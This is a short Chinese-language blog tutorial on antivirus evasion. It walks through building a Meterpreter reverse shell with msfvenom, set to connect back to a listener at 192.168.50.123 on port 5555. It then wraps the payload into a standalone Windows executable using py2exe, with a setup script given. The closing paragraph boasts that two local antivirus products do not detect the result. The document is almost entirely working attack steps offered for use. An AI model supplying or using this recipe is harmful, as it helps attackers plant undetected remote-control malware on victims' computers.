免杀一直以来都是一个永恒的话题,特别是对于我们生成的 shell。无时无刻都需要与安全软件进行较量。了解对方,才能百战不殆。本文将介绍如何利用 Python 生成免杀的 shell。
生成 Python 版本的 Shell
以下是生成 Python shell 的代码:
bash复制msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.50.123 LPORT=5555 -f raw -o bbskali.py
配置 PY2EXE
- 安装 Python 2.7 x86 Windows 版本:
- 下载地址:Python 2.7.16
- 注意:必须使用 x86 版本的 Python 2.7。即使 Windows 是 x64 的,也要安装 32 位版本。
- 安装 32 位 Py2exe for Python 2.7:
- 下载地址:Py2exe 0.6.9
配置 Python 脚本
python复制#! /usr/bin/env python # encoding:utf-8 from distutils.core import setup import py2exe setup( name="shell", description="Python-based App", version="1.0", console=["bbskali.py"], # 第一步生成的 shell 的名字 options={"py2exe": {"bundle_files": 1, "packages": "ctypes", "includes": "base64,sys,socket,struct,time,code,platform,getpass,shutil"}}, zipfile=None )
将上述文件保存为 dabiaoge.py,然后执行以下命令:
bash复制python ./dabiaoge.py py2exe
这将在 dist 目录下生成一个 shell.exe 文件。
效果如下
经本地测试,电脑管家未报毒,360 也正常扫描没有问题。然而,云查杀却报毒。与直接使用 Metasploit 生成的 shell 相比,利用 Python 可以更简单地实现免杀效果。
暂无评论内容